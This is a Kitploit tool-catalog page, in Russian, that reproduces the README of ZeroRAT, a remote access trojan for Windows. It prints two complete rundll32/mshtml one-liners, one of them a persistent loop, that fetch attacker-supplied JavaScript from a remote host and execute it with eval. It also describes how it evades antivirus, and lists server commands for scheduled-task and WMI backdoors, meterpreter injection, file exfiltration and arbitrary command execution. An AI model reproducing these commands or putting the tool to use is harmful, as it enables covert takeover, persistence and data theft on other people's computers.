Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ZeroRAT — ZeroRAT — это однострочный RAT (троян удалённого доступа) для Windows. | Kitploit
Инструменты/GitHubGitHub/5alt/zerorat
Повышение привилегийГенерация полезной нагрузкиМеханизмы персистентностиЭксплуатацияЛатеральное перемещениеШелл-кодЭксфильтрация данныхПост-эксплуатацияКомандование и УправлениеИнструмент Удаленного ДоступаГенерация ШеллкодаТроян Удаленного Доступа
633210 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub5alt/zerorat

ZeroRAT

ZeroRAT — это однострочный RAT (троян удалённого доступа) для Windows.

Репозиторий

#ZeroRAT ##Введение Удалённое управление (RAT) для Windows: клиенту нужно выполнить всего одну команду. Выполнение происходит через штатные программы Windows, файлы на диск не записываются, что обеспечивает естественный обход антивируса. После перезагрузки перестаёт работать.

В программе download и upload рассматриваются с точки зрения клиента. Скачивание файла клиентом с сервера называется download, загрузка файла клиентом на сервер — upload.

##Конфигурация Измените адрес подключения клиента и пароль администратора панели в config.py. Не забудьте проверить и отключить debug.

Программа зависит от flask и sqlite3, установите их через pip.

##Клиент Замените <ip>:<port> на фактический адрес подключения.

Обычная версия

root@kitploit:~
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}

Бессмертная версия

root@kitploit:~
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}

##Сервер Панель: http://<ip>:<port>/server/

Сервер поддерживает следующие команды:

  • sessions — вывести список активных клиентов
  • use <id> — выбрать клиента по id
  • set <key> <value> — задать глобальную переменную
  • show globals/downloads/uploads — просмотреть глобальные переменные, файлы, доступные клиенту для скачивания, и файлы, загруженные клиентом
  • delete session — удалить текущего клиента
  • delete download/upload <id> — удалить файл по id
  • upfile — загрузить файл на сервер и добавить его в список downloads
  • download — задайте переменные download_file и download_save_path, и клиент скачает файл и сохранит его в download_save_path
  • upload — задайте переменную upload_file, и клиент загрузит файл upload_file на сервер
  • backdoor tasks <time> — оставить бэкдор через планировщик задач Windows, формат времени 00:00
  • backdoor wmi — оставить бэкдор через WMI, выполняется каждый час
  • meterpreter shellcode — внедрение meterpreter способом выполнения shellcode через InstallUtil; предварительно нужно задать LHOST и LPORT (команды снова принимаются только после migrate, зависит от .NET Framework 2.0)
  • meterpreter powershell — внедрение meterpreter через PowerShell (зависит от PowerShell 1.0)

Все команды, кроме перечисленных выше, выполняются как системные команды Windows.

Подробнее о командах см. /static/js/xkcd_cli.js

##Разработка Команды бэкенда для клиента: /static/js/xkcd_cli.js

Команды бэкенда для сервера: /controllers/server.py

Клиент: /controllers/client.py

Генерация payload для клиента: payload.py

Работа с базой данных: /models/

##Контакты http://5alt.me

md5_salt [AT] qq.com

##Справочные материалы https://gist.github.com/subTee/f1603fa5c15d5f8825c0

http://drops.wooyun.org/tips/11764

http://drops.wooyun.org/tips/8290

http://drops.wooyun.org/tips/12354

https://github.com/chromakode/xkcdfools

http://www.kammerl.de/ascii/AsciiSignature.php

https://github.com/AlessandroZ/LaZagne

##Отказ от ответственности При использовании данного инструмента соблюдайте местные законы. Инструмент предназначен только для академического тестирования. Категорически запрещается незаконное управление чужими компьютерами. В случае причинения ущерба автор ответственности не несёт.

##License GPLV3

##TODO

  • Улучшить команды
  • Шифрование трафика связи
Скачать инструмент